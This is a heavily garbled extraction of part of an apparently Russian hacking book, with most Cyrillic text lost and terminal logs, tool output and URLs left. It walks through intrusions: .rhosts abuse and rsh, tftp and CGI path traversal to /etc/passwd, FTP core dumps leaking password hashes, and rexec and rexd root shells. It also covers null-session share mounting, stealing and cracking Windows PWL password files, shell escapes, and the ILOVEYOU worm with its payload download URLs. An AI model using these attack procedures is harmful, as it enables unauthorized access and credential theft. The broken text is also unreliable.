8/7/2019 Levin M. Haking 1
64/112
drwxr xr x 6 root other
512 Feb 14 11:19 ..
rwrr 1 dolbilov dolbilov2901 Apr 7 1993 .cshrc
rwrr 1 dolbilov dolbilov
1550 Apr 7 1993 .login
rwrr 1 dolbilov dolbilov
2750 Apr 7 1993 .rootmenu
rwrr 1 dolbilov dolbilov478 Apr 7 1993 .sunview
rw 1 dolbilov dolbilov
2196 Oct 30 1995 mbox
drwxrxrx 2 dolbilov dolbilov
512 Nov 25 1994 timezone
$ echo '+ +' > .rhosts
$ exitdevil# rsh l dolbilov
thsun1.xxxx.xxxxx.su /bin/csh i
$
shell .
5. sendmail
devil# telnet www.xxx.ru 25
Trying 193.124.xxx.xx
Connected to www.xxx.ru.
Escape character is '^]'.
15:55:36 +0400
vrfy serg
550 serg User unknownvrfy alex
250 Alexei E. Katov get
/tmp/../../../../../../../../../etc/pa
sswd /tmp/passwd
tftp> quit
127 128
devil#
7. ftp
Login failed.
ftp> quote pasv
421 Service not available, remote
-
8/7/2019 Levin M. Haking 1
65/112
ftp
, . . .
devil# ftp xxxxxxxxxxx.xxx.com
Connected to xxxxxxxxxxx.xxx.com.
220 xxxxxxxxxxx FTP server (UNIX(r)
System V Release 4.0) ready.
Name (xxxxxxxxxxx.xxx.com:root): ftp
331 Guest login ok, send ident as
password.Password:
230 Guest login ok, access
restrictions apply.
ftp> user root
530 User root unknown.
Login failed.ftp> user root
530 User root unknown.
Login failed.
ftp> user foobar
530 User foobar access denied.
421 Service not available, remote
server has closed connection
ftp> o xxxxxxxxxxx.xxx.comConnected to xxxxxxxxxxx.xxx.com.
220 xxxxxxxxxxx FTP server (UNIX(r)
System V Release 4.0) ready.
Name (xxxxxxxxxxx.xxx.com:root): ftp
331 Guest login ok, send ident as
password.Password:
230 Guest login ok, access
restrictions apply.
ftp> bin
200 Type set to I.
ftp> get core
200 PORT command successful.150 Binary data connection for core
(194...,51553)
(281136 bytes).
226 Binary Transfer complete.
local: core remote: core
281136 bytes received in 16 seconds(17 Kbytes/s)
ftp> bye
221 Goodbye.
devil#
/********** Fragment of core
129 130
************/
.994:..S.:.
srk: a2U/fw.FWhk:.::::..S
:
-
8/7/2019 Levin M. Haking 1
66/112
__ /
harat:__mQb7Pij8mrA:.::::..S@
kchu:__/sPKnswJ8y2:9.::::..S`yhew:__0/L6foNhPoA:9.:::: ..S.
:h6qh9see7ry .M:9353:.:.
pa ..S.WGZ/NEzsLjwe 2:9097::..
flo ..S.Xbra.0mg/PMc :9097:::.
dave ..S.0VnE0zICamE: 9097::::.
on:2 ..T.VqQO2BOU:909 7::::::..:/*************************************
***/
__.
7. rexd
devil# su daemon$ on i faxnetxx.xxx.ru /bin/sh i
$ uname a
faxnetxx faxnetxx 3.2 2 i386
$ id
uid=1(daemon) gid=1(other)
$8. .
rpc. .
X server
X 6000+ . magiccookies xhost +, ,
, (xspy, xpush). 6000 , denial_of_service .
rlogin talkd
, . rlogin TERM, talkd , . , . root.
131 132
rsh rexec
rsh rexec
, , NFS .
-
8/7/2019 Levin M. Haking 1
67/112
log. ,
root (/etc/default/login).
devil# rsh l smtp xxxx.xxx.ru
/bin/csh i
Warning: no access to tty; thus no
job control in this shell
# iduid=0(root) gid=0(root)
devil# nc v xxxx.xxx.ru 512
xxxx.xxx.ru [194.85.xxx.xxx] 512
(exec) open
^@root^@rootpasswd^@/bin/csh i^@
Warning: no access to tty; thus nojob control in this shell
# id
uid=0(root) gid=1(other)
9. .
,
, . .rhosts hosts.equiv., ,
, . DNS NIS .
EssentialNetTools 2.2 , Internet , EssentialNetTools 2.2. . , . ,
133 134
. , ,
, Add Record. . , : ,
-
8/7/2019 Levin M. Haking 1
68/112
,
(pwl, user.dar, system.dat ...). , Internet, Microsoft,
.
(EssentialNetTools ). NBScan IP
, . , RS YES, IP NATShell(starting ip = ending ip), use default NAT list . Go ( , ).
, . LMHost IP ,
, IP
. : NBScan, Open Computer. ,, ,
Share. Share Name \\\ , , Mount.
,
.
NetTool (, Essential) , ,
( , NBScan , ).
135 136
Internet
, , . .
-
8/7/2019 Levin M. Haking 1
69/112
, .
. ,
. : , .
Internet , , .
. ,
: , ( , ). :
, , , , , , ,
. : ,, ?: ( ) , .
.
, , : ,
. : Lta13?Lp ! : ! ,
137 138
: ,, .. ,
. , , .
-
8/7/2019 Levin M. Haking 1
70/112
!
, , . DialUp . , . , , ,
, . , , : , Internet .
Windows
95/98? , Windows 95/98 , PWL. ,
, , (,), PWL. ,
, ,
(HIEW, QVIEW), . MSPWL32.DLL. . ( N) . .
N (X). X+N, 8 , (Y). X+Y, 8, (Z).
XOR Z , , ( , ?). ? ( ).
( ), XOR. , . , xor
139 140
byte ptr [eax+ebp],cl. , ? ,
.
, ,
-
8/7/2019 Levin M. Haking 1
71/112
. ,
30h,0Ch, 28h . . MSPWL32.DLL , 511h ( , ), 90h,90h, 90h NOP (). ,
! ? ! . !!! , : / , , !
, , . , Windows : .,
MSDOS, , .
, , PWL, Windows :
, ,
Windows , . ? ! ! USER.DAT! : Windows 95 M. D.! , Internet,
email . , , , , ( ). email, ( ). :
M. D.! POP3 , DialUp! ? . email PWL, USER.DAT, , , ! ??? !
UUE, , 8 10. .
141 142
10 . 30h, , 7Ah,
30h 9 10
. ! , no sex for you. ,
-
8/7/2019 Levin M. Haking 1
72/112
30h, 9 10
. . , 3Dh. , 0Dh( ) + 30h. 0Dh, 0Ah: .
, , : ! , . : Internet Mail, & reg; . REGEDIT, HKEY_CURRENT_USER/Software/Microsoft/InternetMail and News/Mail/POP3/: Password. Internet Mail. ,
, . , , , , .
. REGEDIT, / . , (*) .. . , () 3Dh
! 15.
? ,, , , ? !
, USER.DAT.HKEY_CURRENT_USER/RemoteAcce
ss/Addresses: . , , ,! ,
, ( XOR). ASCII (, , ,
143 144
, : , , ?)
SPYWIN, HOOKDUMP, KEYWITNESS. ,
-
8/7/2019 Levin M. Haking 1
73/112
?).
HKEY_CURRENT_USER/RemoteAccess/Profile
/""/IP: 0Ch
DNS,
..
HKEY_CURRENT_USER/RemoteAccess/Profile
/ ""/User: .HKEY_CURRENT_USER/Software/Microsoft/
Windows/CurrentVersion/InternetSetting
s/ProxyServer: Proxy .
HKEY_CURRENT_USER/Software/Microsoft/I
nternetMail and News/Mail:
DefaultPOP3Server:
DefaultSMTPServer:
SenderEMail:
Name:
Organization:
.
POP3 "POP3":
Account: Password: ,
, ? , ? .
.
, .
: Internet.
! , , , , .
, , , ? , ,
Internet ,, . , ( )
145 146
. ,
. ? Windows 95/98/NT Legion. IP
-
8/7/2019 Levin M. Haking 1
74/112
, , ,
, , . , , , Internet,
, . , , ,
. , ?
, . , Windows 95/98/NT ,
, . , IP
IP,
. , . ,
www.lamerishe.ru. mIRC, IRC status : /whois*.lamerishe.ru.
:
#RUSSIAN Andrey H andrey@dialup
28059.lamerishe.ru :0 hello.*.junk.com
End of /WHO list.
:
/dns Andrey
mIRC IP
:*** Looking up dialup
28059.lamerishe.ru
*** Resolved dialup
28059.lamerishe.ru to 121.31.21.10
147 148
IP (121.31.21.10) . IP
Windows. MSDOS. e: Enter
-
8/7/2019 Levin M. Haking 1
75/112
IP .
Legion Enter Start IP ( IP) Enter End IP ( IP).
Enter Start IP: 121.31.21.1
Enter End IP: 121.31.21.254
Scan. , , \\121.31.21.87\C, IP C.
MAPPED ONDRIVE E:. , IP , c ( ) . . (
), , , . , .pwl, .
Enter.
. Windows . : E:\>dir win* :
: 224715D0
:\WIN95 113098 6:48p WIN95
0 (,) 0
1 (,) 287,997,952
:
E:\>cd win95E:\WIN95>dir *.pwl
: 224715D0
:\WIN95
ANDREY PWL 730 020599 10:31p
ANDREY.PWL
1 (,) 730
0 (,) 287,997,952
E:\WIN95>copy andrey.pwl
c:\hacking\pwlhack
149 150
, .pwl, .
Internet. :
: L5tRe
fsa3Xfa12
-
8/7/2019 Levin M. Haking 1
76/112
,
E:\121.31.21.87\C, . . ? pwlhack andrey.pwl.
C:\HACKING\PWLHACK>pwlhack.exe /list
andrey.pwl andrey(C) 17Apr1998y by Hard Wisdom
"PWL's Hacker" v3.0 (1996,97,98)
Enter the password:
File 'ANDREY.PWL' has size 730
bytes, version [NEW_Win95_OSR/2]
for user 'ANDREY' with password ''
contains:
[Type][The resource location
string][Password]
Dial X *Rna\
lamerishe\L5tRe fsa3Xfa12
Indexed Entryes: 1; Number of
resources: 1.
!, , ,
: fsa3Xfa12
Internet,, , ( www.lamerishe.ru) ,
Internet. , .
,
Netbus1.0, Netbus Pro 2.0,BackOrifice .. , , IP , , ,
IP.. .
, ? . .
151 152
-
8/7/2019 Levin M. Haking 1
77/112
PGPMail .
.
. , , . , Del
-
8/7/2019 Levin M. Haking 1
78/112
. . . , INF (
). http://www.xakep.ru/soft/5/reg2inf.exe. , , . , INF
, CSU , :
[Version]
Signature="$$"
LayoutFile=bla.inf
[DefaultInstall]
DelReg=del.Reg
[del.Reg]
HKCU,"SOFTWARE\Microsoft\Internet
Explorer\main","Home Page"
,
Add :
0,""
. , INF CSU.INF ( , ,
, ). :
RUNDLL.EXE
SETUPX.DLL,InstallHinfSection
DefaultInstall 64 c:\csu.inf
.
. USER.DA0 SYSTEM.DA0 ( backup ). , . ,
CSU.INF, CSUADD.INF, :
RUNDLL.EXE
SETUPX.DLL,InstallHinfSection
155 156
-
8/7/2019 Levin M. Haking 1
79/112
, :
(Windows 9x
GetTickCount() ) . , ,
-
8/7/2019 Levin M. Haking 1
80/112
(Windows 9x,Windows NT).
LAN Manager( NT: 4.00 NT4,5.00 Windows 2000).
: Master Browser,Backup Browser, PDC,BDC, RAS dialin server.
, ,
, Windows NT. netuse \\1.2.3.4\IPC$ password /user:username. ,
shared resources, , , .
(
Guest, . shared resources .
, . , .
, shared resources.
:
NetBIOS overTCP/IP 135
139 firewall
159 160
1 HKLM\System\CurrentControlS
( , ; ).
-
8/7/2019 Levin M. Haking 1
81/112
et\Control\Lsa\RestrictAnonymous
Guest
loginstation restrictions
account lockout , , ,
.
NT IP (NetBIOS , ).
: ANONYMOUS, ( )
, .
, ( 6 ). Dual Celeron 400MHz96Mb RAM 128 .
. Intruders list,
BlackICE, .
254
161 162
.
:
Null session 102
6.7%
Guest 1 57
3.7%
-
8/7/2019 Levin M. Haking 1
82/112
:
10% Windows
40% Windows, NetBIOS
over TCP/IP, ()
share, Internet,
: Windows NT, (CONNECT: Administrator:.
1524
100%
ping 442
29%
2 453.0%
1 .. IPC$
2 , .
102 100%
Windows 95/98 58 57%
Windows NT SAMBA 44 43%
177 100%
10 6%
,
10 6%
Shared resources
278 100%
171 62%
91 33%
163 164
-
8/7/2019 Levin M. Haking 1
83/112
telnet c 139 . nbtstat. , Windows 95
IP , ScanRange/Enter Start IP Scan Range/EnterEnd IP. ,
-
8/7/2019 Levin M. Haking 1
84/112
Windows NT, ,, , .
LEGION 2.1
Legion 2.1, Rhino9,
share , . , .
IP, . x.x.x.1 x.x.x.255, . Scan Type/Scan Range,
10.20.30.1 10.20.31.255 10.20.30.x 10.20.31.x. , IP , IP. Connection Speed Scan.
:
IP
.
A,M C 195.239.3.48 SPEDIA 195.239.3.64.
167 168
MapDrive, Windows.
LAN NetBios. , .
Legion IP
-
8/7/2019 Levin M. Haking 1
85/112
. NT4 Server Workstation, Windows 95/98. Pentium 100, 32 MBRAM, Windows NT4 / Windows98, 28.8 kbpsmodem. .
Legion NetBios
LAN, , firewall
g
. , . ,
.
Legion NT5
Legion NT5, .
Internet . , . , .,
169 170
, . , ,
.
-
8/7/2019 Levin M. Haking 1
86/112
,, , , . , , ,
distributed.net, RSA RC5 64 .
, , , .
, , , . , , , , ,
.
. , , .
, . , .
171 172
-
8/7/2019 Levin M. Haking 1
87/112
. ,
) (UNIX/UNIX; ROOT/ROOT;ADMIN/ADMIN; SHELL/SHELL;GUEST/GUEST ..). Ha UNIXe
(
-
8/7/2019 Levin M. Haking 1
88/112
. , . , .
Internet:
, UNIX,
shell.
UNIXshella , (
( ) etc, passwd. , , , : ( ) passwd. , ,
. Ha 10 200 . , , UNIX Crack , DOS CrackerJack.
,
175 176
*, .
/etc/shadow
/ t / it /* d t b
-
8/7/2019 Levin M. Haking 1
89/112
, , . :
/etc/security/passwd /tcb/auth/files/ /
/tcb/files/auth/?/ /etc/master.passwd /etc/shadpw /etc/shadow /etc/tcb/aa/user/ /.secure/etc/passwd /etc/passwd[.dir|.pag] /etc/security/passwd.adjunct ##username /etc/shadow
/etc/security/* database /etc/auth[.dir|.pag] /etc/udbHo ,
. . ( ) getpwent(), pp (www.spider.ru) pp
. p, , passwd : +::0:0:::. ,
NIS (Network InformationServer)/YP (Yelow Pages). , ypcat passwd .
177 178
VMS, SYS$SYSTEM:SYSUAF.DAT. VMS
Internet
-
8/7/2019 Levin M. Haking 1
90/112
CHECK_PASSWORD GUESS_PASSWORD, , , .
shell. vi :set shell=/bin/sh, shell :shell. , passwd, . , /etc/utmp,/usr/adm/wtmp, /usr/adm/lastlog.
vi , .
( ) Internet , ,
. Internet , Internet . .
. , , . . .. @
. , @ , :[email protected]. ( , ,
179 180
, :name_prov_login.txt).
,
. , , IP, .
transparent proxy server
-
8/7/2019 Levin M. Haking 1
91/112
. , ( , , , ,
). . passlist.zip (*.zip ) http://www.astalavista.box.sk/, , , . , , , ,name_prov_pass.txt, , .
proxyserver
no transparentproxyserver,
transparent proxy server . , . , email. email IP. , proxyserver. , . IP Kiss.Ru. , , , , IP.
:
IP
var ip=document.f1.ip.value;
181 182
document.write(ip);
//>
login. . , , ,
-
8/7/2019 Levin M. Haking 1
92/112
, , IP. CGI. , , . . ADDR HOST, , notransparent.
WWW .
, , NEWBUGS , , . . , . ,
, . . , FTPd, . . , HACKCRACK, HACKZONE HOLM . DoS ( ), shell. .
rootshell.
CGI. CGI, (Perl, PHP, CGI).
CGI CitForum. , . ( ) CGI,
183 184
. ! printstat.cgi. :
printstat cgi?action=print&con=con&con
. 195.34.32.10. http://195.34.32.10/cgibin/webplus?scripts=/../../../../etc/passwd.
!
-
8/7/2019 Levin M. Haking 1
93/112
printstat.cgi?action print&con con&con2=lpt1&id=csu
CSU. , con2
, , (, lpt1, print. display ..). , , GRINDER. . , , UNIX. . IP . ,
, . , 1.1.1.1 255.255.255.255 /cgibin/webplus.cgi. IP,
! . . John the Ripper. , , . .
VBS.LOVELETTER
ILOVE YOU. ,
( Outlook LotusNotes). ILOVEYOU, kindlycheck the attached LOVELETTER comingfrom me. LOVE
LETTERFORYOU.TXT.vbs. c:\windows Win32DLL.vbs HKEY_LOCAL_MACHINE\Software\Microsoft\CurrentVersion\
185 186
RunServices\Win32DLL. c:\windows\system MSKernel32.vbs LOVELETTERFORYOU.TXT.vbs.
MSKernel32 vbs
http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk
4jnHHGbvbmKLJKjhkqj4w/WIN BUGSFIX
-
8/7/2019 Levin M. Haking 1
94/112
MSKernel32.vbs HKEY_LOCAL_MASCHINE\Software\Microsoft\CurrentVersion\RunServices\MSKernel32.
. , c:\windows\system\LOVELETTERFORYOU.TXT.vbs. , .
WINFAT32.EXE , Internet WINBUGSFIX.EXE. , :
http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WINBUGSFIX.exe
4jnHHGbvbmKLJKjhkqj4w/WINBUGSFIX.exe
http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b
3Vbvg/WINBUGSFIX.exe
http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxc
bvnmadshfgqw237461234iuy7thjg/WINBUGSFIX.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN
BUGSFIX. about:blank (). , . ( FAT32). ,
187 188
, . . WINBUGSFIX.EXE
,
. . ,
. ,
-
8/7/2019 Levin M. Haking 1
95/112
, . .jpg, .jpeg, .js, .vbs, .css,.vbe, .jse, .hta, .sct, .whs, . mp2 mp3. hidden , vbs. , queen_tsmgo.mp3, queen_tsmgo.mp3.vbs. c:\windows\system LOVE
LETTERFORYOU.HTM, MSKernel32.vbs.
mIRC SCRIPTS.INI (
. mIRC , . ). , IRC, . , .
. , . Veryfunny, Joke Mothers Day OrderConfirmation ( mothersday.vbs). . . , . , , .jpg .INI .BAT.
, . .
, , .
Context kindlycheck the attached LOVELETTER comingfrom me. email [email protected] [email protected].
189 190
-
8/7/2019 Levin M. Haking 1
96/112
XXX . (, copy,from . . ,
).
type=button, submit, reset, text ), checked / . ,
.
-
8/7/2019 Levin M. Haking 1
97/112
) ,
METHOD. ( , ): POST GET. POST
, GET . , ACTION=http://csu.ru/cgibin/xxx.cgi, : uname=hellerpasswd=xxxxxxxx,
http://csu.ru/cgibin/xxx.cgi?umane=heller&passwd=xxxxxxxx.
. : . : type ( INPUT. ,button , reset
, submit ,text , radio ( ) checkbox ),name , value (
, (:
action="mailto:[email protected]?Subject=
"CSU"")
( ), , , .
VBScript. ,
. :
,
,
>
VBSCRIPT
193 194
. . PLAY. sub
PLAY end sub ./
-
8/7/2019 Levin M. Haking 1
98/112
/body
, . ONCLICK=PLAY(). , , PLAY. JavaScript. VBScript , HTML. VBScript HTML
>
. , Script, .
, ( HTML VBScript , JavaScript).
dim c
/ . c . :
c=document.f1.t1.value
, . :
document.f1.t2.value=c
! :
,
,
>
VBSCRIPT
195 196
dim csub play
value=Enter onclick=play()>
-
8/7/2019 Levin M. Haking 1
99/112
p y
c=document.f1.t1.value
document.f1.t1.value=c
end sub
>
. . HTML. :
1 100
:
-
8/7/2019 Levin M. Haking 1
100/112
1 100
v=cInt(v)
if qv then
alert " "
-
8/7/2019 Levin M. Haking 1
101/112
:
dim qdim v
dim p
randomize
sub start
q=int(rnd(1)*100+1)
p=0
alert " 1 100"end sub
sub play
p=p+1
v=document.f1.t1.value
if q=v then
document.write ("
"&p&" ")
end if
end sub
>
,
, . . , .
( ), . , ( )
201 202
. . ,
, . ,
. .
,
-
8/7/2019 Levin M. Haking 1
102/112
., .
, . . .
, , , . , . Legion.
. IP , Map Drive. , .
Legion 2.1? . , , Net BIOSa ,
, . , sharinga. EssentialNetTools, Legion, .
scriptkiddie. cgibugs cgi .
cgi Voideye. , ,Damned CGI Scanner 2.1. . , , , void.ru .
203 204
Internet.
.
-
8/7/2019 Levin M. Haking 1
103/112
, , , cgi.
,
. , , , .. . . .
, DCS 2.1 Essential Tools, . , Xavior .
. , .
( ). .
Internet. .
, ,
, , . : ( ) ,
, . , ......
205 206
1 . ,
, .. , .. ,
, .
.
.
-
8/7/2019 Levin M. Haking 1
104/112
. :
, 13 , , . .
.
, .
.
.
.
, . ,
:,
?
, , ?
. Internet .
207 208
, , 6 .
?
,
, , .. , .
, ,
-
8/7/2019 Levin M. Haking 1
105/112
. 40 . , .
?
!
( ) ,
( ) . . , , . , ,
, , .
.
. ,
, , .
, ?
, ?
? ???
. , . . .
: ,, , .
, . ?
209 210
???
.
, . hacker.
31337.?
1. , . .
2. ,
-
8/7/2019 Levin M. Haking 1
106/112
! .
.
. , . .
2 . . , , . ,
. . .
, .
3. ,
, , . , Inetfordollars, [email protected],
.4.
, email telnet ,
., [email protected], :[email protected].
211 212
5. , , .
6.
( ) . ,
, , Internet.
-
8/7/2019 Levin M. Haking 1
107/112
.
7. .
, , , . , Internet.
Spedia
, Internet . , ,
, .
, ,
, , !
,
.
Spedia! , 0.60$ ,
, . , ?, . Internet
, , , . , , ?
213 214
Spedia , , . 2 .
30 . $ .
25% ;
, ;
-
8/7/2019 Levin M. Haking 1
108/112
300 ! : :
, , Internet, , ,
0.5 ; ,
(email) ;
, , ;
,
.
Spediabar, , , Tools Make Money Download. .
, ! !
215 216
WWW ( www.mail.ru)
A V Komlin avkvladru@netscape net
http://cyberportal.narod.ru
: tHe karamba
IPtools
: Pupkin Zade
-
8/7/2019 Levin M. Haking 1
109/112
A.V. Komlin [email protected]
(http://dore.on.ru/kpnc)
FINNAN ([email protected])
: Choosen
:
ANSI.SYS
: Alexander Ermakov
AVP
: ZaDNiCa
AVP
: dr.golova
*.BAT ? *.BAT !
: gaszZone
: PupkinZade
http://kssoft.mastak.com/users/kssoft/iptools.eng/index.htm
IPX
:
(user manual)
: zLOB
http://zlob.bos.ru
MTC: Cfyz
CD KERNEL32.DLL
: Green Mouse
: http://www.emedia.ru/
: Travelling Wind
http://rayon.promedia.minsk.by
217 218
: Reanimator
: zLOB
http://www.zlob.net.ru/
T l t
!
http://www.4prohack.cjb.net
Windows Internet
Maxim V. Stepin. EMail: [email protected]
-
8/7/2019 Levin M. Haking 1
110/112
Telnet
: =Sky12dooR=
.
: Yarix;
Windows
: =BFG=
Windows:
: Epsilon
:
MOOF ([email protected]; http://AnyNews.da.ru)
Hacker Team
hacker [email protected]
FAQ
relcom.fido.ru.hacker
Windows Internet
DS Windows
4prohack
http://www.4prohack.cjb.net
Windows
GrayFlint
219 220
. . . . . . . . . . . . . . . . . . .3
? 10
Internet: . . . . . . . . . . . . . . . . . . . . .175
Internet . . . . . . . .180
proxyserver . . . . . . . . . . . . . . . . . . . . . . . . .181
WWW . . . . . . . . . . . . . . . .183
C C
-
8/7/2019 Levin M. Haking 1
111/112
? . . . . . .10
exploit? . . . . . . . . . . . . . . . . . . . . . .28
root? . . . . . . . . . . . . . . . . . . . . . . . .30
! . . . . . . . . . . . . . . . . . . . . . .38
. . . . . . . . . . . . . . . .49
UIN: Bugs, Crack SocialIngineering . . . . . . . . . . . . . . . . . . . . . . . . . . . .50
Internet . . . . . . . . .62
. . .78
. . . . . .116 . . . . . . . . . . . . . . . . . . . . . . . . . .134
Internet . . . . . . . . . . . . . . . . . . . .137
. . . . . . . . . . . . . . . . . . . . . . . . . .153
shared Internet . .157
Internet Windows Me . . . . . . . . . . . . .165
LEGION 2.1 . . . . . . . . .167
. . . . . . . . . . . . .170
VBS.LOVELETTER . . . . . . . . . . . . . . . . . . . . . . .186
VBScript . . . . . . . . . . . . . . . . . . . . . .192
, . . . . . . .202
. . . . . . . . . . . . . . .206
Spedia . . . . . . . . . . . . . . . . . . . . . . . . . .213
. . . . . .219
221 222
-
8/7/2019 Levin M. Haking 1
112/112
:
.127591, , ., . 53. . 1.
http://www.bookpress.ru
223